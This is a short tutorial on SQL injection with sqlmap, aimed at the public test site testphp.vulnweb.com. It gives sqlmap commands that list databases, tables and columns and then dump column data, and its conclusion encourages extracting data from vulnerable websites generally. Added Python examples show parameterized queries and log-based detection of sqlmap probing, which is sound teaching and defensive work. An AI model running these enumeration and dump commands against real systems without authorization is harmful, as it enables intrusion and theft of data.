
SQL injection using SQLMAP

Ankit Chaubey, 19 June 2022


What is SQL injection?

SQL injection is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.

What is SQLMAP?

SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection.

Where can you use SQLMAP?

When you notice a web URL of the form http://testphp.vulnweb.com/listproducts.php?cat=1, the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when the site is PHP based.


A simple way to check whether your website is vulnerable: replace the value in the GET request parameter with an asterisk (*). If you get an SQL error, then we can conclusively say that the website is vulnerable.
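The following is an added example, not code from the original post: a Python `sqlite3` sketch of how a `cat` parameter like the one above becomes injectable when it is concatenated into the query, next to the parameterized form that is not. The table, data and function names are constructed for illustration; it also shows why the asterisk check produces an SQL error only on the vulnerable version.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's product table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, cat INTEGER, name TEXT);
        INSERT INTO products (cat, name) VALUES
            (1, 'poster'), (1, 'print'), (2, 'frame');
    """)
    return db

def list_products_vulnerable(db, cat):
    # Vulnerable: the request value becomes part of the SQL text itself,
    # so anything the client sends is parsed as SQL.
    sql = "SELECT name FROM products WHERE cat = " + cat
    return sorted(row[0] for row in db.execute(sql))

def list_products_safe(db, cat):
    # Hardened: reject anything that is not an integer, then bind the value
    # as a parameter so it can never change the structure of the query.
    cat_id = int(cat)  # raises ValueError for '*', "1 OR 1=1", ...
    rows = db.execute("SELECT name FROM products WHERE cat = ?", (cat_id,))
    return sorted(row[0] for row in rows)

def outcome(handler, db, cat):
    """Return the handler's rows, or the name of the exception it raised."""
    try:
        return handler(db, cat)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "*", "1 OR 1=1"):
        print(repr(value),
              "| vulnerable:", outcome(list_products_vulnerable, db, value),
              "| safe:", outcome(list_products_safe, db, value))
```

In a web handler, the `ValueError` from the hardened version would map to an HTTP 400 response, so no database error text ever reaches the client.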

Installing sqlmap command
sudo apt-get install sqlmap 

In this tutorial, we will use a vulnerable website that is designed for testing purposes.

Open this link in your browser

http://testphp.vulnweb.com/listproducts.php?cat=1

1. List information of existing database

Open your terminal and type

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

Where -u is for the URL and --dbs is for the database list.

The output shows us that there are two available databases, acuart and information_schema. In some cases, the application will tell you that it has identified the database and ask whether you want to test other database types. You can go ahead and type ‘Y’.

2. List information about Tables present in a particular Database 

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables

Where -u is for the URL, -D is for the database, and --tables is for the tables present in the database.

We see that 8 tables have been retrieved. So now we can say that the website is definitely vulnerable.

3. List information about the columns of a particular table 

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T artists --columns

Where -u is for the URL, -D is for the database, -T is for the table, and --columns is for the columns present in the table.

3 columns were found in the ‘artists’ table in the ‘acuart’ database.

4. Dump the data from the columns

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T artists -C aname --dump

Where -C is for the column name and --dump dumps the data from the column.

You can see that we have accessed the data from the database.
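From the site owner's side, the enumeration in steps 1 to 4 leaves a recognizable trail in the web server's access log. The following is an added example, not part of the original post: a Python check that flags requests whose `cat` value is not an integer or whose User-Agent names sqlmap. The log lines, IP addresses and the version in the User-Agent string are constructed samples.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Combined-log-format line: client IP, request target, status, user-agent.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [19/Jun/2022:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Jun/2022:10:00:04 +0000] "GET /listproducts.php?cat=* HTTP/1.1" 200 310 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Jun/2022:10:00:09 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 200 310 "-" "sqlmap/1.6#stable (https://sqlmap.org)"
203.0.113.9 - - [19/Jun/2022:10:00:10 +0000] "GET /listproducts.php?cat=1%20AND%204821%3D4821 HTTP/1.1" 200 5120 "-" "sqlmap/1.6#stable (https://sqlmap.org)"
198.51.100.7 - - [19/Jun/2022:10:00:12 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""

def suspicious_requests(log_text, param="cat"):
    """Return (ip, target, reasons) for each request that looks like probing."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        reasons = []
        # The User-Agent is client-controlled, so treat it as a weak signal.
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap user-agent")
        # Stronger signal: the parameter is a numeric id, so any decoded
        # value that is not all digits did not come from a normal page link.
        query = urlsplit(m["target"]).query
        values = parse_qs(query, keep_blank_values=True).get(param, [])
        if any(not v.isdigit() for v in values):
            reasons.append("non-integer " + param)
        if reasons:
            findings.append((m["ip"], m["target"], reasons))
    return findings

def by_client(findings):
    """Count flagged requests per client IP to spot a scanning source."""
    return Counter(ip for ip, _, _ in findings)

if __name__ == "__main__":
    hits = suspicious_requests(SAMPLE_LOG)
    for ip, target, reasons in hits:
        print(ip, target, ", ".join(reasons))
    print(dict(by_client(hits)))
```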

Conclusion

Applying this method to such vulnerable websites, you can literally explore the databases to extract information.
